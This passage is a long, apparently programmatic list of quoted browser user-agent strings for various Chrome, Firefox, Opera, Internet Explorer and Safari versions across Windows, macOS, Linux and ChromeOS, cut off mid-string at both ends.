x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0)', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/52.59.12', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/51.0', 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 
Firefox/40.1', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/52.59.12', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 
(Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/26.0', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 
Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1', 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/58.0', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; 
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 